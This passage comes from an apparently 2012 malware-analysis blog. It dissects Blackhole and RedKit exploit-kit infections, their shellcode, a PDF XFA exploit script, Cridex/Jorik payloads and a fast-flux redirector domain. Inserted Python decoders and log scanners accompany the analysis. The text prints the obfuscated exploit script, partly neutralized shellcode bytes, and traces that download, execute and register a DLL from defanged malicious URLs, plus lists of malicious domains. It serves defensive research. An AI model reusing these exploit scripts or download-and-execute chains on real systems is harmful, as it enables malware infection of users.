     LPUNKNOWN = 0x28621a40 =>  none;
     LPCTSTR = 0x28621a48 => 
           = "h00p://virtual-geocaching.net/w.php?f=80f39&e=1";
     LPCTSTR = 0x298ddb50 => 
           = "c:\tmp\wpbt0.dll";  // saved here...
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0x0;
UINT WINAPI WinExec (       // execute it here..
     LPCSTR = 0x298ddb70 => 
           = "c:\tmp\wpbt0.dll";
     UINT uCmdShow = 0;
) =  0x20;
UINT WINAPI WinExec (
     LPCSTR = 0x298ddbb0 => 
           = "regsvr32 -s c:\tmp\wpbt0.dll"; //register it...
     UINT uCmdShow = 0;
) =  0x20;
BOOL TerminateThread (
     HANDLE hThread = -2;    // exit...
     DWORD dwExitCode = 0;
) =  0x0;
While the other one, shellcode 2, is very similar to it, aiming at a different download URL:
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68 
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
Meaning: "h00p://virtual-geocaching.net/w.php?f=80f39&e=4"
For the PDF infector, most scanners cannot detect the evil script written in it, below:
<xfa:script contentType='application/x-javascript'>
with(event){
e=target["eval"];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.subject;}
}
a=a.split(".");
s="";
z=a;
for(i in a){
zz=i;
}
for(i=0;i<zz;i++){
 s+=String.fromCharCode(-33+1*z[i]);
}
e(""+s);
</xfa:script>
↑While the Subject object contains the exploit & shellcode:
<</Subject(130.145.145.79.130.141.134.147.149.94.134
77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 //exploit
92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8
1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89
.92.80.136.77.72.72.74.92.151.130.147.65.128.141.83.
1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81
141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1
  :
snip
  :
CreationDate(66;83;e4;fc;fc;85;e4; //shelcode
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00;...blah
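As an added example (my code, not the post's own) covering both the shellcode 2 bytes and the XFA script above: a decoder that applies the script's own arithmetic (split on ".", subtract 33, take the char code) to the first line of the Subject value, and a strings-style URL extraction for the shellcode blob. Note the script's loop runs `i<zz` where zz is the last index, so it silently drops the final token; the decoder reproduces that and can also decode the cut fragment in full. Inputs are the fragments quoted in the post; function names are mine.

```python
"""Decode the XFA Subject obfuscation and pull the URL out of shellcode 2.
Added example, not code from the post; inputs are the post's own fragments."""
import re

# First line of the Subject value quoted in the post (the only line not cut
# by the blog's wrapping).
SUBJECT_FRAGMENT = "130.145.145.79.130.141.134.147.149.94.134"

# Shellcode 2 bytes as listed in the post.
SHELLCODE2_HEX = """
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
"""


def decode_xfa_subject(subject, drop_last=True):
    """Mirror the XFA script: split on '.', each number minus 33 is a char code.
    The script's loop is for(i=0;i<zz;i++) with zz = LAST index, so the final
    token is never emitted; drop_last=True reproduces that exactly, while
    drop_last=False decodes every token (useful on a wrapped fragment)."""
    tokens = [t for t in subject.strip().split(".") if t]
    if drop_last:
        tokens = tokens[:-1]
    return "".join(chr(int(t) - 33) for t in tokens)


URL_RE = re.compile(rb"https?://[\x21-\x7e]+")  # printable ASCII; the NUL ends the match


def extract_urls(blob):
    """Printable-ASCII URLs embedded in a shellcode blob."""
    return [m.group(0).decode("ascii") for m in URL_RE.finditer(blob)]


def defang(url):
    """Report URLs the way the post does (h00p://) so they are not clickable."""
    return re.sub(r"^http", "h00p", url)


def shellcode2_download_url():
    blob = bytes.fromhex(SHELLCODE2_HEX)  # fromhex ignores the whitespace
    return [defang(u) for u in extract_urls(blob)]
```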
The payload itself is the PE file of Trojan/Cridex, which has the analysis below:
Sample's MD5 3158bc97bf424fcd905caa22b29767b9

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..

Compile Time: 2012-09-18 02:55:38
CRC Fail: Claimed:  0 Actual:  130407
Packer: PureBasic 4.x -> Neil Hodgson 
Sections:
   .code 0x1000 0x24cf 9728
   .text 0x4000 0x23c8 9216
   .rdata 0x7000 0x10 512 
   .data 0x8000 0xa8c 1536

Drops:
%Appdata%\kb00085031.exe (payload)
%Temp%\exp1.tmp
%temp%\exp1.tmp.bat

Collects information:
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled)
HKLM\​System\​CurrentControlSet\​Control\​Terminal Server (TSUserEnabled )

At the time I got this, only 3 AV products detected it:
Symantec                 : W32.Cridex
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Downloader.A
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
I uploaded samples to VirusTotal to check/monitor the RECENT detection ratio (see pic):
So the moral of the story is: with BHEK infector domains lasting up to 2 days max, with landing pages changing per click on BHEK2 and hourly on the previous version, and with them starting to use network tools for protection & C&C deployment, we have a strong opponent that we mustn't ignore.

#MalwareMustDie!

Sunday, September 16, 2012

A peek into "qaqipwel.ru" a Malicious Domain Redirector with Pseudo/Dynamic IP - Infector to RedKit Exploit Kit

This is a quickie, so please bear with it. The information might be important for people who handle malware infector sites.

While handling a report that led to the RedKit Exploit Kit/Pack, I came to a domain that is actively redirecting users to the RedKit Exploit Kit's landing page.
This domain is qaqipwel.ru

It uses pseudo DNS for its NS & A records to avoid blocking/tracking; it is currently up and alive, and has a strong DNS network backbone for round-robin of the IP/DNS addresses, for the purpose of distributing the malware landing page or spam pages.
I tagged & checked this for only a couple of days so far to confirm the redirection activities above. Here go the details (Warning: this might not be too interesting for client security solution guys, and I am not going to discuss the RedKit Exploit Kit itself in this post; please see this link for the details: RedKit Exploit Kit Information--->>HERE)

The URL provided by qaqipwel.ru has changed; currently it is below:
h00p://qaqipwel.ru/count22.php
If you track it correctly you will end up in these redirections, for the last 24 hrs:
h00p://sa-wan.com/93020006.html // RedKit EK Landing Page
h00p://cestasefloresluana.com.br/30400006.html // RedKit EK Landing Page
h00p://mytabletcialis.com/ // Clialis/viagra site
h00p://goherdscan.com/  // Canadian Pharmacy
As PoC, when fetching the infector page you'll get many redirection tricks like these:
Case 1
--15:35:30--  h00p://qaqipwel.ru/count22.php
           => `count22.php'
Resolving qaqipwel.ru... 77.38.198.12
Connecting to qaqipwel.ru|77.38.198.12|:80... connected.
HTTP request sent, awaiting response... 302
Location: h00p://sa-wan.com/93020006.html [following]
--15:35:33--  h00p://sa-wan.com/93020006.html
           => `93020006.html'
Resolving sa-wan.com... 72.167.232.75
Connecting to sa-wan.com|72.167.232.75|:80... connected.
Case 2
--15:49:39--  h00p://qaqipwel.ru/count22.php
           => `count22.php.1'
Resolving qaqipwel.ru... 77.90.120.34
Connecting to qaqipwel.ru|77.90.120.34|:80... connected.
HTTP request sent, awaiting response... 200
Length: 146 []
15:49:40 (0.00 B/s) - `count22.php' saved [146/146]

HTTP/1.1 200
Server: Apache
Content-Length: 142
Content-Type:
Last-Modified: .., 16 ... 2012 06:42:12 GMT
Accept-Ranges: bytes
Server: nginx/0.8.34
Date: Sun, 16 Sep 2012 06:42:15 GMT
X-Powered-By: PHP/5.3.2
<!DOCTYPE HTML><html><head>
<script type="text/javascript">
parent.location.href = "h00p://goherdscan.com/";</script>
:
Case 3 (via tor)
--2012-09-16 15:16:04--  h00p://qaqipwel.ru/count22.php
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 302
Location: h00p://cestasefloresluana.com.br/30400006.html [following]
--2012-09-16 15:16:12--  h00p://cestasefloresluana.com.br/30400006.html
Connecting to localhost (localhost)|::1|:8118... connected.
Case 4
--2012-09-16 15:20:10--  h00p://qaqipwel.ru/count22.php
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200
Length: 146 []
Saving to: `count22.php'
100%[=============>] 146  361B/s  in 0.4s
Last-modified header invalid -- time-stamp ignored.
2012-09-16 15:20:12 (361 B/s) - `count22.php' saved [146/146]
$ cat count22.php
<!DOCTYPE HTML><html><head>
<script type="text/javascript">
parent.location.href = "h00p://mytabletcialis.com/";</script>
:
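The four cases above show the same URL answering either with an HTTP 302 Location or with a 200 page that carries a JavaScript location assignment. As an added example (my code, not the post's own), here is a next-hop extractor that handles both, plus a meta-refresh variant, and an inventory of the distinct destinations seen across repeated fetches. The sample responses are constructed from Case 1 and Case 2; the mechanism labels and names are mine.

```python
"""Extract the next hop from one fetch of the count22.php redirector.
Added example, not the post's code; sample responses built from the cases above."""
import re

JS_LOCATION = re.compile(
    r"(?:parent|top|window|self|document)?\.?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]",
    re.I)
META_REFRESH = re.compile(
    r"<meta[^>]*http-equiv\s*=\s*['\"]?refresh['\"]?[^>]*content\s*=\s*['\"]?\s*\d+\s*;\s*url=([^'\">\s]+)",
    re.I)

# Constructed from Case 1: a plain HTTP redirect to the EK landing page.
CASE1 = {"status": 302, "headers": {"Location": "h00p://sa-wan.com/93020006.html"}, "body": ""}
# Constructed from Case 2: 200 OK with the 146-byte JS hop the post shows.
CASE2 = {"status": 200, "headers": {"Server": "nginx/0.8.34", "X-Powered-By": "PHP/5.3.2"},
         "body": '<!DOCTYPE HTML><html><head>\n<script type="text/javascript">\n'
                 'parent.location.href = "h00p://goherdscan.com/";</script>'}
# Constructed extra: the same trick done with a meta refresh (hypothetical host).
CASE_META = {"status": 200, "headers": {},
             "body": '<html><head><meta http-equiv="refresh" content="0;url=h00p://example.invalid/"></head></html>'}
# Constructed control: a normal page with no redirect at all.
PLAIN = {"status": 200, "headers": {}, "body": "<html><body>hello</body></html>"}


def next_hop(resp):
    """Return (mechanism, url), or (None, None) when the response does not redirect."""
    if 300 <= resp["status"] < 400:
        loc = {k.lower(): v for k, v in resp["headers"].items()}.get("location")
        if loc:
            return "http-3xx", loc
    m = JS_LOCATION.search(resp["body"])
    if m:
        return "js-location", m.group(1)
    m = META_REFRESH.search(resp["body"])
    if m:
        return "meta-refresh", m.group(1)
    return None, None


def hop_inventory(responses):
    """Distinct destinations (and the mechanism each used) across repeated
    fetches of one redirector URL; this is how the per-fetch rotation shows up."""
    seen = {}
    for r in responses:
        mech, url = next_hop(r)
        if url:
            seen.setdefault(url, set()).add(mech)
    return seen
```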
If you look up the domain registration it shows this data:
IP: 62.84.60.2
INET: 62.84.60.0/22
AS: AS39824
ISP: ALMANET-AS JSC AlmaTV
Country: Kazakhstan
State/Region: Almaty City
City: Almaty
Latitude: 43.25
Longitude: 76.95
Which in actuality is like these:
PSEUDO A (IP) RECORDS DETECTED BY FACTS:
and so on... (last counted 233 IPs, Sept 17th 2012)
And the official DNS registration was:
domain:        QAQIPWEL.RU (A records per NS changes)
nserver:       ns1.chokode.com. 3545 IN A 217.144.208.27
nserver:       ns2.chokode.com. 3469 IN A 175.194.252.182
nserver:       ns3.chokode.com. 3394 IN A 87.110.121.10
nserver:       ns4.chokode.com. 3394 IN A 178.155.43.251
nserver:       ns5.chokode.com. 3600 IN A 111.184.220.233
nserver:       ns6.chokode.com. 3394 IN A 94.53.46.22
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: http://www.webdrive.ru/webmail/
created:       2012.09.06
paid-till:     2013.09.06
free-date:     2013.10.07
While in actuality you will get these random DNS records:
↑Please see how the IP ADDRESS of each NS host keeps changing↑ Additionally, some DNS delegation information:
+-d.dns.ripn.net (194.190.124.17)
| +-e.dns.ripn.net (193.232.142.17)
| | +-f.dns.ripn.net (193.232.156.17)
| | | +-ns.ripn.net (194.85.105.17)
| | | | +-ns2.nic.fr (192.93.0.4)
| | | | | +-ns5.msk-ix.net (193.232.128.6)
| | | | | | +-ns9.ripn.net (194.85.252.62)
| | | | | | |
This infected url was uploaded to urlquery here--->>[CLICK] And currently we have only weak detection of qaqipwel.ru in the blacklists:
Conclusion: Such a professional malicious redirector provider currently exists. The domain names below are the ones used for this evil purpose:
nujqamdi.ru axbuzyg.ru aldiplil.ru uqnymtyq.ru bawodnes.ru gezahcyg.ru cilcenok.ru vecvycte.ru irroxux.ru unxajen.ru meewxib.ru deqbyyq.ru byxkauv.ru qovizki.ru huenhaz.eu axbuzyg.ru kykufep.ru luxypuj.eu ( ↑ domains detected by the time this blog was written)
The following variants of the landing-page filename "count$.php" were detected:
count4.php count20.php count21.php count19.php count18.php count16.php count17.php count14.php count5.php count13.php count11.php count12.php count25.php count6.php count15.php ( ↑ landing pages detected by the time this blog was written)
Domain names can be changed and the IP addresses are pseudo/dynamically changed. We cannot depend on blacklists anymore to nail this kind of infector.
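To make the point above concrete, here is an added example (not from the blog, and not any MalwareMustDie tool) of a squid access.log filter that flags the landing page by the shape of the URL rather than by a fixed domain list: a short random-looking label under .ru/.eu plus a /count<N>.php path, exactly the pattern listed above. The four known-bad domains are taken from the list in the post; the log lines, the client IPs and the domain qwzxtryp.ru are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Shape of the landing page seen in the post: /countNN.php on a 6-8 letter
# second-level label under .ru or .eu.  Matching the shape catches the next
# domain before any blacklist does.
LANDING_RE = re.compile(r"^/count(\d{1,2})\.php$")
HOST_RE = re.compile(r"^[a-z]{6,8}\.(ru|eu)$")
# Subset of the domains listed in the post, used only as a secondary check.
KNOWN_BAD = {"nujqamdi.ru", "axbuzyg.ru", "aldiplil.ru", "huenhaz.eu"}


def classify_url(url):
    """Return 'blacklisted', 'pattern', or None for one requested URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in KNOWN_BAD:
        return "blacklisted"
    if HOST_RE.match(host) and LANDING_RE.match(parts.path):
        return "pattern"
    return None


def scan_squid_log(lines):
    """Yield (client_ip, url, verdict) for squid native-format access.log
    lines whose URL matches either check.  Field layout of the native log:
    time elapsed client action/code size method URL ident hierarchy/peer type."""
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]
        verdict = classify_url(url)
        if verdict:
            yield client, url, verdict


# Constructed sample log lines (client IPs and qwzxtryp.ru are made up).
SAMPLE_LOG = """\
1348900001.123    245 10.0.0.5 TCP_MISS/200 1874 GET http://nujqamdi.ru/count4.php - DIRECT/192.0.2.10 text/html
1348900002.456    120 10.0.0.7 TCP_MISS/200 1901 GET http://qwzxtryp.ru/count21.php - DIRECT/192.0.2.11 text/html
1348900003.789     33 10.0.0.5 TCP_HIT/200 5120 GET http://www.example.com/count.php - NONE/- text/html
1348900004.012     40 10.0.0.9 TCP_MISS/200 8012 GET http://example.ru/index.php - DIRECT/192.0.2.12 text/html
""".splitlines()

if __name__ == "__main__":
    for client, url, verdict in scan_squid_log(SAMPLE_LOG):
        print(f"{verdict:12} {client:10} {url}")
```

The second line is the interesting one: qwzxtryp.ru is on no list, yet the path and host shape give it away. The host regex is loose on purpose and will also match legitimate short .ru domains, so treat a "pattern" hit as a hunting lead to pivot on (what did the client fetch next, what did that host resolve to), not as a block rule on its own.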

Slight changes detected in shellcode & dropper works of Blackhole Exploit Kit (landing page: 203.91.113.6 / mothership: 146.185.220.34)

Well, currently #MalwareMustDie is in hunting mode, so I joined the event. This is actually a report of the first case in hand, which is becoming an important matter in the investigation of BHEK.
I received a report of infection, and after looking at a squid log I found the source,
which is 203.91.113.6 and is "suspected" of serving blackhole.
Why I quoted that word is because I am about 95% sure of it.

Just arrived home from a 6hrs driving trip; after setting up freebsd for analysis mode,
setting up privoxy & tor, I am aiming at the IP I mentioned previously.
The reported url in the squid log doesn't seem to exist anymore,
looks like the parameter was changed, which was:
h00p://bode-sales.net/w.php?f=9e4b3&e=2
I tried to combine the latest possible blackhole parameters and finally managed to download the below url (via tor only..)
--21:26:28-- h00p://bode-sales.net/main.php?page=3c23940fb7350489
  => `main.php@page=3c23940fb7350489'
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Resolving bode-sales.net... 203.91.113.6
Connecting to bode-sales.net|203.91.113.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 68,856 40.80K/s
21:26:32 (40.74 KB/s) - `main.php' saved [68856]

GET /main.php?page=3c23940fb7350489 HTTP/1.0
User-Agent: MalwareMustDieDieDieee/666.666.666
Accept: */*
Host: bode-sales.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Sep 2012 12:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14
....(blah)
The file itself is the obvious BHEK landing page with obfuscated JS code; for research purposes I neutralized it here:-->>[PASTEBIN] And after deobfuscating it I found the Plugin Detection of blackhole, which for research purposes I also neutralized here:-->>[PASTEBIN] The first time I checked this landing page in Virus Total the detection was ZERO, now:
MD5: 88ebe56bca027174ab28406ddbafa2e6
File size: 67.2 KB ( 68856 bytes )
File name: main.php
File type: HTML
Detection: 4 / 42
Analysis date: 2012-09-15 17:09:47 UTC ( 0 分 ago )
URL: ---------->>[VIRUS-TOTAL]
Malware Name:
McAfee : JS/Exploit-Blacole.gq
Symantec : Trojan.Malscript
McAfee-GW-Edition : JS/Exploit-Blacole.gq
Kaspersky : Trojan-Downloader.JS.Expack.adl
Like previously reported in this blog-->[HERE], basically the exploit vector of the plugin detect is unchanged, and in our case now we have 6 (six) exploitations.
(The details are exactly as reported beforehand)
1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9]
2. PDF File AcroPDF.PDF
3. DOMDocs Msxml2.XMLHTTP
4. Java Exploit javaplugin.191_40
5. Java webStart exploit JavaWebStart.isInstalled
*) I thought this time was without the SWF Exploit infector. A friend advised me and then I realized there is a
6. SWF Exploit (field.swf)-->[VT:20/42]
However we have slight changes in the shellcode. I am a big fan of shellzer, a PyDbg based shellcode decoder, and I use it often in many of my projects. We had a problem figuring out this blog's shellcode using shellzer. So I cracked it manually; if some of you have the same problem I am sharing this howto as reference: The above infector exploits have the mission to execute the below shellcode:
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 e9 56fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4 a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3 af 1c Ocad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3 24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b 5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7 d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 2O cO b4 d6 d7 d7a6 66 26 c4 bO d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7 58 4O 5c 5c 58 12 O7 O7 4a 47 4c 4d O5 5b 49 44 4d 5b O6 46 4d 5c O7 5f O6 58 4O 58 17 4e 15 1d 1e 4b 1f 49 Oe 4d 15 19 28 28 *) PS: the above↑shellcode is neutralized
FYI, shellzer hangs if you paste this code. I am not going into debugging details on WHY it hangs, let's focus on the point and solve the code.. Let's dump all of the strings first, you'll get something like this:
iiiiN ..u4._3 d.@0.@ f.^< t3,.. u..4$..uQ..LQV.u<.t5x .V.v @..; u.^.^$ K.F. ....h .......XPj@h ...P. PU...^ .hon..hurlmT ...a .r.. ...\$ AQj.j.SWj. j... ?.u.G /p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((
We won't know what this is all about except for the look of an obfuscated URL in the last line, so I scanned it to get the below signatures & info..
msf.fnstenv_mov: D9EED97424F45B817313
msf.jmp_call_additive: EB0C5E56311EAD01C3
msf.noupper: EB195E8BFE83C7008BD7
msf.shikata_ga_nai: DAD729C9B15AD97424F4
msf.single_static_bit: EB655E31ED83E10183E301
msf.countdown: FFC15E304C0E07E2FA
msf.call4_dw: FFC05E81760E
CCCCCC.xor: 434343434343EB0F5B33C966B9
77efe4.xor: 304500454975F9EB00
CCCC_INC_EBX_Slide: 43434343
XXXX_pop_eax_start: 58585858
7_push_PSQRVWU: 505351525657559CE8
push_user32: 68333200006855736572
push_urlmon: 686F6E00006875726C6D
push_shell32: 686C333200687368656C
edi_seh_k32: 33FF64FF37648927FF07EBE8
peb_k32: 64A1300000008B400C8B701C
hasher.ror7: 3AD67408C1CB0703DA40
E9Eb.hasher.rol3xor: C1C20332104080380075F5
didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC
By this I guessed that API methods of urlmon.dll, and others, were used in the code.. but couldn't detect any kernel32.dll API yet.. Let's skip it for a while.. Now it is time to bruteforce (bf) the code, you can use any tools available and try some bf logic! :-) Shortly, I got these interesting strings and fixed them:
h00p://bode-sales.net/w.php?f=56c7a&e=1
$regsvr32 -s $hwpbt$i.dll
*) further, $h leads to temp dir strings & $i leads to null values, so I put 0 in it.
The story is that urlmon.dll is being called to download a malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1", save it as %Temp%wpbt0.dll, execute it, and register it with the "regsvr32 -s" command on your PC. Looks like we have a slight change in the shellcode API: the calls now come from a non-kernel32.dll library. This is a different point compared to the previous BHEK shellcode. So let's see what payload it is (using tor) and save it the way the malware scheme wanted it.
--2012-09-15 20:47:08-- h00p://bode-sales.net/w.php?f=56c7a
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 143207 (140K) [application/x-msdownload]
Saving to: `wpbt0.dll'
100%[======>] 143,207 44.5K/s in 3.1s
2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]
It is a PE binary with the below analysis:
Hexing first sector:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP....
0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2....
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B..............
00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................
↑Quick reversing it...to seek some clue..
[0x00000000:0x00400000]> d
0x00000000 (01) 4d            DEC EBP
0x00000001 (01) 5a            POP EDX
0x00000002 (01) 90            NOP
0x00000003 (02) 0003          ADD [EBX], AL
0x00000005 (02) 0000          ADD [EAX], AL
0x00000007 (03) 000400        ADD [EAX+EAX], AL
0x0000000a (02) 0000          ADD [EAX], AL
0x0000000c (01) ff            DB 0xff
0x0000000d (02) ff00          INC DWORD [EAX]
0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH
0x00000015 (02) 0000          ADD [EAX], AL
0x00000017 (03) 0040 00       ADD [EAX+0x0], AL
:
:   ーーーーーtastes like a packer trace..ーーーー
0x00000034 (02) 0000          ADD [EAX], AL
0x00000036 (02) 0000          ADD [EAX], AL
0x00000038 (02) 0000          ADD [EAX], AL
0x0000003a (02) 0000          ADD [EAX], AL
0x0000003c (03) 8000 00       ADD BYTE [EAX], 0x0
0x0000003f (02) 000e          ADD [ESI], CL
0x00000041 (01) 1f            POP DS
0x00000042 (05) ba 0e00b409   MOV EDX, 0x9b4000e
0x00000047 (02) cd 21         INT 0x21
0x00000049 (05) b8 014ccd21   MOV EAX, 0x21cd4c01
0x0000004e (01) 54            PUSH ESP
0x0000004f (05) 68 69732070   PUSH 0x70207369
0x00000054 (02) 72 6f         JB 0x000000c5 ; 1
:
:
PE Summary
Entry Point: 0x1000 at section: .code
CRC Fail: Claimed: 0 Actual: 185076
Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW!
Packer: PureBasic 4.x -> Neil Hodgson
Compiler: Microsoft Visual C++ 5/6
Sections:
.code  0x1000  0x2775 10240
.teXT  0x4000  0xc335 50176
.rdata 0x11000 0x1a0f 7168
.data  0x13000 0x1218 2560
.rsrc  0x15000 0x115c 4608
Auto reverse first block and ...got the loops :-P
[0x401000L] push 0x0
[0x401005L] push 0x413998
[0x40100aL] call 0x404070L
[0x40100fL] add esp 0xc
[0x401014L] push 0x0
: loop :
[0x401677L] call 0x4021b7L   //a h*ll of a looper...anti-reverse trap, patch it!
[0x40167aL] fstp st0
[0x40167fL] fild [0x413a08]
[0x401681L] fmul [0x413040]
[0x401687L] sub esp 0x4
[0x40168dL] fstp [esp]
Calls: Complete calls listed here:--->>[PASTEBIN]
With the calls summary as per below:
Get system env, opening/exec files (by original C code), opening thread, using timer, bitmap object manipulation, GUI operations, using winsock, creation of TLS, creation of semaphores
↑OK, looks strange enough, let's reverse it well. I used radare2. You can use anything you like; if you reversed it correctly you'll find the below malicious API calls inside the packed parts of the sample (tip: unpack it first):
CopyFileW (lpExistingFileName: "%Temp%wpbt0.dll", lpNewFileName: "%ApData%\KB00725031.exe", bFailIfExists: 0x0)
CreateRemoteThread (hProcess: 0x68, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x12032f0, lpParameter: 0x1200000, dwCreationFlags: 0x0, lpThreadId: 0x0)
So we have a self-copy operation and foreign memory injection here. Yes, let's use a sandbox to quickly confirm it:
Malicious Processes
1960 c:\test\sample.exe (wpbt0.dll)
328  c:\documents and settings\user\application data\kb00725031.exe
Yes, it dropped the malicious malware kb00725031.exe - and somehow I remembered this filename from a while ago. I searched & found it here --->>[LINK] (It will be another story, a long history, for the details of this drop) Let's continue; Virus Total showed this detection when I found the payload the 1st time:
AntiVir : TR/Buzus.HT.11
AhnLab-V3 : Trojan/Win32.Jorik
Sophos : Mal/EncPk-AFN
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Kaspersky : Trojan.Win32.Jorik.Foreign.aa
Microsoft : VirTool:Win32/CeeInject.gen!HT
Comodo : UnclassifiedMalware
Now it is becoming:
MD5: a70da3ce151ac0eb46e3a0d959cd0af3
File size: 139.9 KB ( 143207 bytes )
File name: wpbt0.dll
File type: Win32 EXE
Detection : 9 / 41
Analysis date: 2012-09-15 16:21:04 UTC ( 0 分 ago )
URL:-------->>>[CLICK/VIRUS-TOTAL]
Malware Name:
VIPRE : Trojan.Win32.Generic!BT (NEW)
AntiVir : TR/Buzus.HT.11 (NEW)
AhnLab-V3 : Trojan/Win32.Jorik
ESET-NOD32 : a variant of Win32/Injector.WNM (NEW)
Sophos : Mal/EncPk-AFN
Microsoft : VirTool:Win32/CeeInject.gen!HT
